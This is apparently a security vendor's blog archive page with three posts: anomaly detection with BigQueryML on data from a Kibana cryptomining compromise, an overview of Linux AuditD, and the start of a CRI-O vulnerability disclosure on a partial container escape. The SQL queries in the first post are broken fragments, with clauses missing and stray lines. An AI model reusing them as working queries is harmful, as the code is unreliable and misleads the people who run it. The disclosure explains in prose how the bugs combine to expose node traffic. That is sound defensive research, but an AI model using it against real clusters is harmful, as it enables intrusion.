Archive for the ‘Capsule8 Labs’ Category

Unsupervised Anomaly Detection Using BigQueryML and Capsule8

Posted by

In a sea of data that contains a tiny speck of evidence of maliciousness somewhere, where do we start? What is the most optimal way to swim through the inconsequential information to get to that small cluster of anomalous spikes? Big data in information security is a complicated problem due to the sheer volume of data generated by various security agents, and the variety of attack profiles — ranging from script kiddies to nation-state hackers. 

In this post, we will use a case study to demonstrate how to detect anomalous activity using a toolkit comprised of: Capsule8 Investigations, BigQueryML, and a machine learning model. We will show you that your organization can leverage these tools for sophisticated security detection without an official data science team or big budget. A little high-level learning and some SQL query skills are all that’s required.

An Unintentional Honeypot: Proof of Concept

It would be prudent to note that security ML has a somewhat garbage reputation, and rightly so — false positives, overfitting, poor training data, and uninterpretable black box models commonly plague defenders who just wanted to detect attacks better. Vendors are infamous for applying ML as the answer without first considering the question they’re trying to answer.

We want to approach things more intelligently, starting by asking, “What problem do we need to solve?” and then carefully evaluating whether an ML approach will help us get closer to the optimal solution. 

Today, the problem we want to solve is one that arose from a real incident. We will use the tale of an unintentional honeypot as a proof of concept of the power of machine learning applied to our C8 Investigations capabilities. This tale starts with the compromise of one of Capsule8’s test clusters that was running vulnerable applications for demo purposes, which was alerted on by Capsule8’s detection running in the cluster. After some analysis by the research team, we determined that an RCE vulnerability in Kibana was being exploited for cryptomining. 

This incident formulated a concrete problem statement for our data science team to solve; can we use off-the-shelf models from Google’s BigQueryML to build an unsupervised anomaly detection model? More specifically:

  • Could we start with the smallest possible dataset to train a machine learning model that successfully detects future anomalous activity?  
  • What would be the overhead for this model?
  • Could our model detect additional data points and anomalies that were not previously uncovered?

What can this unintentional honeypot teach us about the application of machine learning to quickly identify outliers? Is it a tool we should consider having in our security toolbox? Let’s try to answer these questions by exploring the dataset, applying BigQueryML and anomaly detection logic, and analyzing the results.

Exploring our Dataset

Leveraging incident data pertaining to the Kibana compromise — stored via our C8 Investigations capability — we began by only using process events out of all possible system events. We wanted to see how the model performed with a limited scope first to evaluate the results, and the results were indeed fruitful, as you’ll see! But first, let’s explore the raw data to set the context for setting up our model.

The specific Kubernetes cluster that generated our dataset was set up on October 4th, and we received the first alert from Capsule8 about the aforementioned attack on October 24th. To visualize how the process events look over this given period of time, we will create a data summary.

If you look at our data summary below, which shows the raw count of process events seen each day, the event counts are pretty consistent — around 5 million events per day from October 16th until October 22nd. However, there is approximately a 9% dip on October 23rd, and around 13% rise on October 24th to 25th, which suggests something fishy is happening on those specific dates.

With this incident data in hand, we now move to applying BigQueryML to our data.

Leveraging BigQueryML for Anomaly Detection

With Google’s BigQuery ML, building simple machine learning (ML) models is more accessible than ever. It allows users to build and execute ML models using SQL queries, which removes the traditional dependency on specialized data science teams — anyone who can write SQL queries can use the service. BigQuery ML currently supports linear regression, logistic regression, K-means clustering, and any pre-trained TensorFlow model. Further information on BigQueryML can be found in its documentation.

Preprocessing is a critical step for security data, given the large volume of data and duplicate events within it. Our raw process events data had features including (but not limited to) the process path, unix timestamp, and the login username. Thus, as part of our preprocessing, we encoded the process path to numeric values and extracted the date and hour of day from the unix timestamps. 

Given we have around 5 million data points per day, we also wanted to see how many of the data points are unique. For instance, is the same process, (e.g., dhclient), being spawned by the same parent process, (/usr/sbin/NetworkManager), at the same time of day? By determining the unique data points, we can combine and reduce the size of our data. 

After preprocessing, our sanitized dataset looks as follows:

As you can see, it includes readable date and hour values, as well as numeric values corresponding to specific path and username strings. Now that we have our data cleaned, let’s proceed with testing our use case.

But first, which BigQueryML model to use?

As mentioned before, K-means clustering is one of the off-the-shelf models available in BigQueryML. The goal of the algorithm is to split the data into K groups based on the features provided. Those of you who are security or ops engineers without any data science expertise might be wondering how difficult it will be to work with this model. The great news is that K-means clustering is one of the most accessible models available in the data science stack. 

The two requirements you need to use K-means clustering in BigQueryML are a high-level understanding of the algorithm and some experience in writing SQL queries. The rest of the mathematical magic is covered by readily available functions from BigQueryML. 

For our experiment, we will be following Google’s helpful and accessible tutorial on how to build a K-means clustering model using BigQueryML, as well as its companion on how to use K-means clustering for anomaly detection. We will be adding onto these tutorials in a few places, which we’ll note so you can follow along. 

Creating our Anomaly Detection Logic

With the common complaints of security ML in mind, we decided that the model’s inherent logic should generate very few alerts. We also realized that the parameters of the model must be designed to be extremely tunable. These two design choices combined should allow us enough leeway to detect as little or as many anomalies we would want to analyze further. 

Using K-means clustering as an unsupervised classification method helped us meet these design criteria, and so we proceeded to apply it to our problem of anomaly detection on the security event data we sanitized. As we mentioned before about Google’s blog post on how to do this, we follow the blog’s suggestion where you find the outliers in each cluster by computing the 95th percentile. 

This method separates data into two groups, generating a threshold — the 95% of data points that are smaller than the threshold, and the 5% that are larger than the threshold, and hence are the farthest outliers of the specific cluster. The threshold here is the maximum distance from the cluster’s centroid, measured in Euclidean distance. Data points farther than that are considered anomalous. 

However, a threshold at the 95th percentile is insufficiently precise for our use case. Assuming we have minimized the variance within each cluster, the farthest 5% outliers are still not specific enough to denote which ones are malicious. This method would just produce a large number of false positives, which we don’t want. 

To solve this conundrum, we go one level deeper, Inception-style, and fish out the data points that are N standard deviations away from the mean among the farthest 5% outliers. In this experiment, we tested different values and settled on N=3, which demonstrated high sensitivity and specificity (higher N values will give lower number of anomalies, which would reduce the number of false positives in a good model). We optimized for these two characteristics because we are extremely cautious about acceptable false positive rates. 

Let’s run through the steps of creating the K-means clustering model and creating the anomaly detection logic.

Step 1: Training and Model creation

From BigQueryML, we can use the CREATE OR REPLACE MODEL statement to create a K-means clustering model and train it on our dataset from October 16 until October 20:

    standardize_features = TRUE) AS
    DISTINCT hour,

Step 2: Detecting outliers in each cluster

Once the model is created post-training, we use the PREDICT statement to predict the cluster that each training data point belongs to, which also gives us the distance for each data point from its cluster centroid. We then calculate the 95th percentile threshold for each of the 4 clusters (using the APPROX_QUANTILES function). This will return the farthest 5% of data points in each cluster. Here’s how that query looks:

  Distances AS (
      MIN(NEAREST_CENTROIDS_DISTANCE.DISTANCE) AS distance_from_closest_centroid
      ML.PREDICT(MODEL eric300.proc_clusters4,
          DISTINCT hour,

            `cap8-big-query-testing.eric300.process_train_data`)) AS ML
    Threshold AS (
        (9500)],2) AS threshold
TrainingOutliers AS (
  Distances d
  d.distance_from_closest_centroid > Threshold.threshold)

Step 3: Calculating our anomaly threshold

Now that we have the farthest 5% outliers in each cluster, let’s set the threshold for anomalies as 3 standard deviations away from the mean among the outliers. The query for setting the threshold looks like this:

MaxClusterDistance AS (
  AVG(distance_from_closest_centroid) + 3*(STDDEV(distance_from_closest_centroid)) AS max_distance
FROM TrainingOutliers

Now we have a set threshold, meaning any datapoint in the validation dataset (used in step 4) whose distance from the centroid of its cluster is more than this threshold seen during training, will be classified as anomalous. 

Note: This method of calculating N=3 standard deviations away from the mean of outliers reduces the number of anomalies for the security analyst.  Specifically, 5% outliers of all clusters contained 385 data points, which was then reduced to 109 anomalies after calculating 3 standard deviations, which is 71% less data! 

Step 4: Running the clustering model on test/ validation dataset

Next, we repeat step 2 using validation data instead of the training dataset. This assigns every data point in the test dataset to one of the 4 clusters, and also gives us the distance for each of the data points from its cluster centroid.

Step 5: Finding anomalies

Now that we have predicted the clusters for the validation dataset, we must compare the distance from the centroid to the anomalous threshold for each cluster. For all the data points whose distance from cluster centroid is more than the corresponding threshold value, we classify them as anomalies. The query looks like this:

KMeansAnomalyPred AS (
MaxClusterDistance X

TestingOutliers Y


Y.distance_from_closest_centroid1 > X.max_distance)

SELECT * FROM KMeansAnomalyPred

Examining Our Results

With these results in hand, let’s return to the 3 questions we asked ourselves to ensure we are creating a valuable model rather than a cool-but-useless model.

1) Could we start with the smallest possible dataset to train a machine learning model that successfully detects future anomalous activity?  

Yes! We only selected the process data from Capsule8 Investigations, trained the readily available K-means clustering model on baseline normal data, and successfully detected malicious activity (validated by security researchers). Out of 13,149 total test data points, the BigQueryML K-means clustering model detected 109 total anomalies. 

We were immediately able to detect specific anomalous spikes in our input features, like process activity, weird username activity, and time of day, which were later confirmed to be cryptomining activities. We also found that most of these anomalies (93.5%) occurred from 6pm to 11pm ET, which is outside of normal work hours. Process and temporal anomalies were exactly the types of signals we were seeking — identifying outliers or anomalies spikes based on modeling the true baseline behavior. 

If data science happens in a forest without a visualization, does anyone hear it? To visualize our data, we can use Data Studio, the visualization tool that’s included with every BigQuery project. Using these visualizations, let’s explore the processes that were classified as anomalous by our model:

As the chart shows, there was quite a variety of Linux processes related to events that were classified as anomalous. Unsurprisingly, /bin/sh, the Linux system shell, was most common, since interactive shells on Kibana instances are not typical workflow components. Also of note is /usr/bin/pkill, which is used by some cryptominers to kill competitive cryptomining processes, but isn’t a common process on an otherwise quiet Kibana host.

Additionally, we can see the timeline of detected anomalies:

For those defending Linux infrastructure, these sorts of visualizations can help inform detection policies, as well as rules on what processes and scripts are allowed on your infrastructure (and when). For instance, adopting immutable infrastructure allows you to disable shell access by default, which would eliminate the most common anomaly found by our model.

2) What would be the overhead for this model?

There are three major overhead costs which we need to consider for any real world application of ML: anomaly-free baseline data to train the model, training time, and false positive rate. 

Baseline training data: A common cause of concern for applied ML in infosec is the need to train the model in a controlled, anomaly-free environment to ensure only pure baseline behavior is modelled. This is not an inconsequential ask and is generally expensively time-consuming. In our experiment, we started with the assumption that the training data represents true baseline. This assumption is supported by the fact that we didn’t receive any unexpected alerts from Capsule8, which was deployed in the same cluster.

Training time: As model complexity grows, the training time and infrastructure costs tend to skyrocket, which is understandably painful to organizations. For our experiment, we tackled this problem with the use of intelligent preprocessing steps to condense the data, and by using BigQueryML to deploy the model on a sanitized dataset. Our training time was around 3min 28sec, which is very small compared to complex models that can take multiple hours.

False positive rate: To validate the results, we enlisted our security research team to label all the 109 supposedly malicious data points. Out of the 109 anomalies our model detected, 99 were labelled as true positives and 10 of them as false positives. 

But to calculate false positive rate, we need “ground truth” — labels to validate the model result. To do so, we enlisted our own product, which tags all events related to the alerts as “suspicious incidents.” We are considering these “suspicious incidents” as true positives, while all events not tagged as incidents are considered true negatives. With this data in hand, let’s calculate the False Positive Rate.

False Positive Rate = False Positives / (False Positives + True Negatives)
= 10 / (10 + 11917)
= 0.00084           

This means our false positive rate is 0.08%. This is a promising result, given that 98% of security teams experience false positives rates greater than 1% when using EDR products (and 77% of teams experience EDR false positives rates above 25%!). 

Unfortunately, calculating a false negative rate here is tricky, since we don’t know the exact number of true malicious data points unless all 13,149 data points are manually labeled (which is expensive and unnecessary for this experiment). The bottom line is that the model outputs a readable number of anomalies that doesn’t exacerbate alert fatigue, while at the same time offering a desirably minimal number (<0.1%) of false positives.

3) Could our model detect additional data points and anomalies that were not previously uncovered?

Yes, it could! All the alerts generated from deterministic detection denoted either a  new malicious interactive shell or a file created by a malicious program. Our model not only found some of these malicious interactive shells, but also many attacker-controlled processes descending from the shells. 

Part of Capsule8’s detection special sauce is that we automatically tag malicious descendants to “specific incidents” that are presented as part of the same alert, creating an attack narrative to aid incident response (which is pretty cool!). Therefore, it’s a great sign that our BigQueryML model can also detect these malicious descendants as anomalous. It reassures the deterministic detection engine’s logic of tagging the suspicious events so they are readily available to those investigating an incident’s alert, but not alerting on each event individually. Our ML model helps verify the suspicions, enhancing detection confidence.


We hope we’ve shown that the fate for machine learning applied to security doesn’t have to be garbage! In this post, we’ve seen how we can leverage Capsule8’s investigations data along with Google’s BigQueryML to build powerful anomaly detection models for monitoring your infrastructure, like Kubernetes clusters. 

This approach does not require you to build a whole new data science pipeline, or a fancy data science team — BigQueryML combined with Capsule8’s Investigations capability takes care of it all. The same combination can also be used to build user behavior models using pre-built TensorFlow models. 

Many people are understandably wary about the application of ML to infosec due to the need for specialized data science teams and the humongous amount of false positives. But as we’ve shown, not only are the BigQueryML models less resource-intensive to create than traditional machine learning systems, our anomaly threshold logic for the model also offers a low false positive rate. 

Thus, with a bit of quick studying and SQL query elbow-grease, you can gain the benefits of mathematical magic without needing to be a data science wizard, or burning yourself out with alert fatigue. 

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.

What is the Linux Auditing System (aka AuditD)?

Posted by

The Linux Auditing System is a native feature to the Linux kernel that collects certain types of system activity to facilitate incident investigation. In this post, we will cover what it is as well as how people deploy and manage it. We will also discuss its strengths — namely it being offered for the delicious price of “free” — and its weaknesses, including excessive overhead, lack of granularity, missing container support, onerous output, and bugginess. 

Our goal is to present a neutral overview of the Linux Auditing System so anyone considering implementing it in their own organization knows what to consider before embarking on their quest and what challenges may lurk ahead.

You are more likely to have heard the term “AuditD” before, rather than the rather prolix “Linux Auditing System.” So, where does AuditD fit in? The audit system’s components include kernel code to hook syscalls, plus a userland daemon that logs syscall events. This userland daemon component is auditd, and because it is the default admin interface to the kernel subsystem, people use “auditd” as a colloquial reference to the whole audit system.

The Linux Auditing subsystem is capable of monitoring three distinct things:

  • System calls: See which system calls were called, along with contextual information like the arguments passed to it, user information, and more.
  • File access: This is an alternative way to monitor file access activity, rather than directly monitoring the open system call and related calls. 
  • Select, pre-configured auditable events within the kernel: Red Hat maintains a list of these types of events.

Using these categories of events, you can audit activity like authentications, failed cryptographic operations, abnormal terminations, program execution, and SELinux modifications. When audit rules are triggered, the Linux Audit System outputs a record with a variety of fields. We will walk through an example output below, but see the full list for all possible fields.

type=1300 msg=audit(01/01/2020 13:37:89.567:444): arch=c000003e syscall=323 success=yes exit=42 a0=feae74 a1=80000 a2=1b6 a3=9434e28 items=1 ppid=1337 pid=1812 auid=300 uid=500 gid=500 euid=0 suid=0 fsuid=0 egid=500 sgid=500 fsgid=500 tty=pts2 ses=2 comm=”sudo” exe=”/usr/bin/sudo” subj=unconfined_u:unconfined_r:unconfined_t:20-s0:c0.c1023 key=”test_audit”

This audit record tells us that a user with auid 300 used an ssh terminal to use the sudo command to invoke the userfaultfd syscall as root, on January 1, 2020 at 13:37 GMT. You can see how this level of detail can be useful for inspecting system behavior during incident response and building a timeline of activity.

While useful for post-hoc investigation, the Linux Audit System is not intended to provide protection. It can help you figure out what’s going on, but if an attacker exploits your system, the audit system will be more like a small dog yapping at the mailman, birds, passing cars, an ice cream truck, your neighbor taking out the trash, and oh, yes, also the burglars as they leave your house.

Next, we will go through how to operationalize the Linux Auditing System by creating rules and viewing logs.

Creating Rules

It is highly likely you will need to create your own rules when implementing the Linux Auditing System. The audit system only enables limited logging by default, focused on security-related commands like logins, logouts, sudo usage, and SELinux-related messages. However, there are pre-configured rule files in the audit package based on four certification standards, which you can always copy into your audit rules file if they meet your needs:

  • Controlled Access Protection Profile (CAPP): capp.rules
  • Labeled Security Protection Profile (LSPP): lspp.rules
  • National Industrial Security Program Operating Manual (NISPOM): nispom.rules
  • Security Technical Implementations Guide (STIG): stig.rules

Unfortunately, even if you use these pre-configured rules, you need quite a bit of thinky thinky to properly set up AuditD. When considering adding audit rules to a specific system, first ask yourself what you need to audit. Do you need to audit when people delete files? Which directories are most important to audit? What kind of files are most sensitive to your operations? 

As you think through these questions, remember that there are really two types of audit rules you can write — file system and system call rules. Any other system activity, such as specific scripts executed, userland events, and internal kernel behaviors that can be triggered independently of syscalls (e.g. disabling SELinux) are out of scope for the Linux Auditing System. Additionally, there are control rules that are used to configure the audit system (e.g. setting event rate limits, failure modes, etc.). We will not go into how to write rules here, but we recommend Digital Ocean’s guide as a place to start.

Another consideration during rule creation is that audit rules work on a “first match wins” basis, meaning once audited activity matches a rule, none of the rules on the rest of the list will be evaluated. Thus, you must think carefully about the order in which you write your rules. By default, new rules are added to the bottom of the list (so will be evaluated last). For those of you lamentably experienced in the pleasures of writing firewall rules, this old-school drawback of rules not being recursive will be bitterly familiar.

Once you’ve figured out what rules to write, you will be writing them in the /etc/audit/audit.rules file. audit.rules will be loaded by the audit daemon whenever it’s started. Of course, you’ll probably want to edit these rules at some point. Using the auditctl utility will only make temporary changes, so you must modify the actual audit.rules file whenever you want to make a permanent change. For companies using immutable infrastructure and CI/CD pipelines, all you need to do is update the audit rules in your base image. 

However, companies without the blessing of immutable infra will face a trickier time editing audit rules across a fleet. Popular configuration management tools can help. Chef offers a cookbook for installing auditd and the pre-configured rulesets we mentioned earlier, with the option to add your own rules. For Puppet, the U.K. Government Digital Service open sourced its puppet-auditd project, which handles installation of the audit daemon and manages audit configuration and rules. OpenStack’s ansible-hardening project includes auditd configuration as part of automating implementation of of STIG’s security hardening guide.

As you can see, adopting immutable infrastructure and pushing out audit rules through your CI/CD pipelines saves quite a bit of a hassle — leaving you more time to think carefully about the audit rules you create. The next hurdle is viewing your audit logs.

Viewing logs

After you create your audit rules and deploy them on your Linux systems, you probably want to see the logs generated by a triggered rule (I cannot imagine anyone creates audit rules for funsies, but you do you). The audit system’s logs are stored by default in /var/log/audit/audit.log, which can be viewed like any text file except for being so dense that you may want to blind yourself. Thus, most people query the audit logs. 

Native utilities for querying audit records include ausearch and aureport. Ausearch allows you to search your audit log files for specific criteria, such as command name, event identifier, hostname, group name, key identifier, message, syscall, and more. Aureport creates summary reports from the audit log files. Aureport shows less information per event than ausearch but presents it in a more readable, tabular display. 

The default deployment of the audit system is to query local files. The audisp-remote plugin can be used to send logs to a remote server rather than query them locally. It does so by taking audit events and writing them to syslog, which can then be sent on to a logging server. The data format is anchored around key=value, so it will take additional work or tooling to output your audit logs into friendlier formats like JSON or XML. 

If you want centralized analysis, you must export your logs to a log management / SIEM tool (e.g. rsyslog, Splunk, ELK, Nagios, etc.) or data pipeline / warehousing tools (Apache Kafka, Google BigQuery, AWS Athena, etc.). You will likely need to employ cron jobs for scripts that periodically push the local audit logs to your central log hub. For instance, a fancier setup could have each host with audit logs directly write to a Kafka, PubSub, or Kinesis stream. 

This is why it is essential that, before you invest in building out a data pipeline leveraging the Linux Auditing System, you determine:

  • What activity you need to log on each host
  • Where the logs will go
  • How the logs will be stored and consumed

AuditD’s Strengths

The Linux Auditing System’s primary value proposition is in facilitating investigations, especially historical investigations in response to an incident. As outlined earlier, both file and system calls can be audited, including failed logins, authentications, failed syscalls, abnormal terminations, executed programs, and more. Most regular system activity falls within that purview, so your problem is certainly not going to be too low a volume of data.

The Linux Auditing System also does not cost money (not including time), and as revelatory as this may be, it turns out that people like getting things for free.

AuditD’s Weaknesses

There are quite a few weaknesses of AuditD, without which maybe Linux security could be considered “solved” and we could all go on vacation. The primary weaknesses we will cover here include excessive overhead, lack of granularity, missing container support, onerous output, and bugginess.

Excessive Overhead

The additional overhead by enabling the Linux Auditing System is generally formidable. One of our customers found an 80% increase in userspace syscall overhead. This means that system performance is only slightly over half of what it would be with auditing disabled, as measured by how many syscalls the system can perform. 

Reasonably, we would not expect that real workloads would incur such extreme overhead, but overhead statistics for the Linux Auditing System are unfortunately seldom made public. With that said, one source from 2015 cited that a system capable of performing 200,000 open/close syscalls per second can only perform 3,000 open/close syscalls with auditing enabled (1.5% of normal performance). Another individual reported overhead increases between 62% to 245%. Until proper statistics are published, the evidence suggests that Linux auditing performance concerns are not to be shrugged aside.

The file-related audit rules are particularly prone to generating performance degradation. Because everything on Linux is a file, implementing rules for file creation, deletion, ownership, or permission changes can slow down filesystem operations. Setting flush=incremental_async in audit.conf can improve performance by flushing records to disk (i.e. transferring the logs from the buffer to the hard disk) at a given interval (specified by freq), but not all at once.

We have seen some companies deal with the overhead problem by auditing very little data — only auditing select system calls and applying heavy filtering — so that the overhead is much lower. However, that approach discards security-relevant data that could be useful for investigation, which defeats the purpose of using auditing. Another attempted option is growing the size of the internal buffer used by the Linux Auditing System. Unfortunately, the more CPU the auditing system consumes, the more likely it is to exacerbate performance problems since it cannot load shed (i.e. it is unable to drop data when resource demand is above system capacity).

Lack of Detection Granularity

The Linux Auditing System can audit quite a lot of system activity, but it lacks depth. Certain types of unwanted activity cannot be fully captured by the Linux Auditing System. In particular, auditing file access or modification can prove challenging, as any relative paths or symlinks will be resolved only after the audit event. Thus, you would need to collect all file related actions (like opens, forks, etc.) and treat it as one of those ten-thousand-piece-puzzles during investigation, meticulously and tediously piecing together the history of activity involving the file from countless logs. 

The syscall execveat is one example of this impediment. It runs programs based on file descriptors, which means your audit log will show that execveat was invoked, but not what precisely was executed by it. Another syscall which falls prey to this limitation in visibility is fchmod, which changes file permissions. Auditing fchmod will generate a log entry that refers to file descriptor and the new mode (permissions), but the entry will not include the target file path — which adds time and effort to investigative work.

Additionally, organizations may want to detect when executables are created. This activity consists of multiple operations, including file creation, many writes to disk, and potentially a chmod (changing access permissions). Each of these events must be stitched back together once collected in order to glean the appropriate context around the activity. This can prove especially difficult without engendering unmanageable overhead — because collecting a record of each write event on a system might generate a black hole that consumes all data within its event horizon. 

Being able to see the full context around activity supports incident response by helping you determine the impact of unwanted activity across your systems. Moreover, seeing unwanted events from all possible angles also provides invaluable feedback to refine your detection coverage, ensuring you can detect similar activity on your systems going forward.

Missing Container Support

The Linux Auditing System does not support containerized systems, as Richard Guy Briggs (one of audit’s core maintainers) outlined in a presentation last year.  The primary barrier is the audit system’s namespace ID tracking being “complex and incomplete” — events are associated with different IDs for each namespaced subsystem (of which there are many in each container… and they are dynamic). Until container orchestrators can apply inheritable, immutable tags to processes that can be included in audit logs — which is still firmly in the concept phase — the inability to correctly track containers to events will persist.

The other main barrier is the Linux Auditing System’s current restriction of only permitting one one audit daemon running at a time. This means that audit rules from that auditing system will apply to all of the containers running on the host, making rule customization impossible. Your options to cope with this are not ideal. You can create as bland of rules as possible that could apply to all containers, but that would not accomplish much. If you are made out of money or in a position to blackmail Splunk, you can instead create a cacophony of rules and then perform analytics on the logs once collected.

Thus, if you operate in a containerized environment, you will not be able to accurately audit events, nor customize audit rules per container, if you use the Linux Auditing System. For organizations using microservices, this can present a problem, as you now require an additional monitoring system if you want to collect container-based activity.

“At the moment, auditd can be used inside a container only for aggregating logs from other systems. It cannot be used to get events relevant to the container or the host OS. Container support is still under development.”
~ Red Hat
July 19, 2018

Onerous Output

As you perhaps gathered from the “Viewing Logs” section earlier, the Linux Auditing System’s output is far from user-friendly. The data format is anchored around key=value, and audit logs cannot be output in JSON or XML without extra effort. Events can arrive out of order and take up multiple lines. It is basically a hot mess. Therefore, if you want a nicer output, you will need to implement additional tools for cleaning and conversion — and more tools if you want to store and query audit logs in a centralized place.


“Treating the kernel part as a reliable black box seems unwise to me.”
~ Andy Lutomirski

A core maintainer for syscall infrastructure on Linux lowkey hates AuditD and recommends staying away from it due to unreliability, saying, “the syscall auditing infrastructure is awful.” Beyond the issues he cites, there is the palpable issue of no one tasked with stress testing the Linux Auditing System, which is perhaps why the considerable performance issues linger. 

Until someone helps fix it upstream, Lutomirski recommends not using it in production and instead using syscall tracing infrastructure. That guidance may seem a bit extreme, but when a Linux kernel maintainer proclaims that “the code is a giant mess,” it is probably worth contemplating.


Obviously, we think Capsule8 is the best alternative for detecting unwanted system activity in Linux and goes way beyond the Linux Auditing System’s capabilities. Nevertheless, here are some tools that are considered direct replacements for the userland agent (auditd) — but keep in mind that you can only run one userland audit subsystem at a time, so migrating between agents will likely prove challenging:

  • Auditbeat by Elastic collects events from the Linux Auditing System and centralizes them by shipping these logs to Elasticsearch. You can then use Kibana to analyze the data. Note that this still requires quite a bit of configuration and still relies on Linux’s audit events, but absolutely removes the “output unfriendliness” problem. 
  • Slack’s go-audit completely replaces auditd, designed in a way to ideally reduce the overhead, unfriendly output, and bugginess problems. It outputs JSON and can write to a variety of outputs (including syslog, local file, graylog2, or stdout). Like Auditbeat, go-audit is built specifically with centralized logging in mind.
  • OSquery is another option to replace auditd — using the osqueryd monitoring daemon — as shown in Palantir’s post on auditing with osquery.
  • Mozilla’s audit-go was another alternative, but given it was written as a plugin for Heka, which is now deprecated, it is probably not wise to invest in implementing it as an auditd replacement.


It is quite awesome that Linux offers a native way to collect some system events that can be queried for post-hoc investigation. Unfortunately, the Linux Auditing System presents performance, UX, and systems support challenges that are potentially intolerable for many enterprises. Each organization is different, so what may be an implementation and maintenance nightmare for you may not be for another company. However, it is important that organizations understand the strengths and weaknesses of the Linux Auditing System before investing in it and embarking on a potentially perilous quest.

Related Content

Recent Posts

OOMyPod: Nothin’ To CRI-O-bout

Posted by

Gather around the fire for a story about the unlikely partnership of bugs that led to a partial container escape. While this is a fairly technical post covering some container and Kubernetes components, we included links throughout if you want to learn about them or need a refresher while reading.  


Three issues in CRI-O (the default Kubernetes’ container engine for Red Hat’s OpenShift and openSUSE’s Kubic), combined with an overzealous out-of-memory (OOM) killer in recent Linux kernels, can enable a partial container escape for hosts running CRI-O and Kubernetes. If the stars align, a contained process/workload (e.g. your nginx container) can snoop on network traffic and connect to arbitrary services (e.g. the kubelet) on the affected node, as well as interact with the node’s shared memory and IPC mechanisms. In older versions of Kubernetes, this meant whole node takeover. In more recent times, exploitation is more deployment-specific. 

As an example, these vulnerabilities could be exploited to dump all HTTP traffic destined for containers on a node — probably relevant if you use SSL termination early on in your stack — as any customer or corporate data flowing through the compromised node would be fair game to an attacker. This could mean passwords, personally identifiable information (PII), or other goodies could be viewed by an attacker at their leisure.

There’s no need to panic, though. It’s good to note that there isn’t a generic complete container escape or node takeover path using these bugs (on the setups we’ve looked at, anyway). Furthermore, to trigger these issues requires the ability to create a pod based on a container image you control, which requires additional effort by attackers to obtain. So, it’s more like stars have to be aligned between galaxies. There are a number of GitHub issues related to these bugs, but nothing tying all of the elements at play together. After spending some time on the issue we finally reproduced it, and are pleased to share the results with you today!

CVE-2019-14891 has been assigned for one of the issues we identified. Resolution of this issue greatly reduces the likelihood of this scenario manifesting. We’d like to give a big thanks to the CRI-O and Red Hat security teams for their great response and mitigation of these issues!

Is there a patch?

Yes, as of CRI-O version 1.16.1! However, it’s pretty easy to mitigate the issue provided you are running CRI-O v1.15 or greater. Simply add (or change) the following directive in your /etc/crio/crio.conf file:

conmon_cgroup: system.slice

The above is the default setting for conmon_cgroup as of 1.16.1. Read below to find out why putting conmon in a non-pod cgroup is a good idea!

So.. What’s a CRI-O?

CRI-O is a lightweight container engine, like Docker, but one that is built specifically for use with Kubernetes. In fact, it was started as a Kubernetes incubator project. It uses the Kubernetes CRI (Container Runtime Interface) for container management.

CRI-O is the default container engine for Kubic (openSUSe’s Kubernetes distribution) and OpenShift — so while it still has minority market share, it is rapidly gaining popularity.


We’re not going to explain Kubernetes and Pods here in any real depth. This is a great resource for getting up to speed with that. We’ll grossly simplify things here:

  • A pod is a collection of containers that share some resources
  • A pod will always have at least two containers in it when deployed:
    • An infrastructure container, which will typically run the pause process which just waits for a workload container to finish
    • A workload container (e.g. nginx, clamav, etc) that actually does the work
  • Each pod member will have its own container monitor (conmon in CRI-O the universe, docker-containerd-shim in Docker-land)
  • These containers are created using whatever container runtime is configured. The vast majority of the time, this is runc.

The above stuff will become more relevant soon when we start talking about the different issues in CRI-O. Which is now!

Issue #1: All Process Eggs in One CGroup Basket

The first issue relates to how CRI-O assigns cgroups to processes. One goal of CRI-O is to account for all of the memory usage of each individual pod. To do so, all of the processes related to a given pod are placed in the same memory cgroup. 

An aside: Memory cgroups and the Out-Of-Memory (OOM) killer

What is a memory cgroup? A core component of resource management on Linux — and especially in containers — is the use of control groups (cgroups) to account for and limit resources such as CPU and memory for a process or group of processes. Memory cgroups allow for finer-grained control over how much memory an application can use.

The OOM killer is a kernel helper for dealing with memory-hungry processes. When a system is experiencing very heavy memory usage, the kernel goes around and slays whatever is using the most memory — in the hopes of keeping the system doing whatever it’s meant to be doing. Sounds helpful! The OOM killer uses SIGKILL to get rid of the process (and reclaim memory) as soon as possible.

To be more helpful, the kernel’s OOM killer got a makeover in 4.19+ kernels, gaining cgroup awareness. Now, instead of just killing the single process that is using the most memory on the whole system (I’m looking at you, Chrome), it will monitor cgroups.  For example, if you created a pod (which also creates a cgroup) for your huge Java application and assigned it 256MB of memory, 256MB is all that Java could ever use, even if you have a terabyte of RAM on the host. All processes in that pod’s cgroup are subject to that memory restriction, so if there was another container in that pod (for example, a caching service), it would have to share that same 256MB. If that pod uses its full allotted 256MB, the OOM killer would kill the biggest memory hog in the pod — and not the biggest memory user of the whole system.. 

But the killer can be a bit excitable at times. If two processes in the same memory cgroup trigger the OOM killer at the same time (e.g. by trying to make an allocation on different CPU cores), the OOM killer becomes a literal OOM serial killer — issuing two OOM kills in sequence. This behavior seems to be limited to 4.19 through 5.2.x kernels. Note that if a process is killed with great prejudice (SIGKILL), no signal handlers run. That is, there is no graceful termination or shutdown of the process. The process is just shot in broad daylight. More on this in a moment — but for now, back to CRI-O.

In the interest of keeping track of exactly how much memory a container requires to run, CRI-O lumps the workload process (below, our test program called repro) and the “infrastructure container” process (the pause process — more on this under issue #2) — along with their associated conmon monitor processes — into the same cgroup. You can see the cgroup members in this OOM killer snippet below:

Nov 20 00:56:34 ubu-disco kernel: [  136.324486] Tasks state (memory values in pages):
Nov 20 00:56:34 ubu-disco kernel: [  136.324486] [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 00:56:34 ubu-disco kernel: [  136.324576] [   3825]     0  3825    19521      471    57344        0          -999 conmon
Nov 20 00:56:34 ubu-disco kernel: [  136.324577] [   3849]     0  3849      255        1    28672        0          -998 pause
Nov 20 00:56:34 ubu-disco kernel: [  136.324589] [   4254]     0  4254    19521      442    53248        0          -999 conmon
Nov 20 00:56:34 ubu-disco kernel: [  136.324591] [   4304]     0  4304    66664     3632    90112        0           996 repro
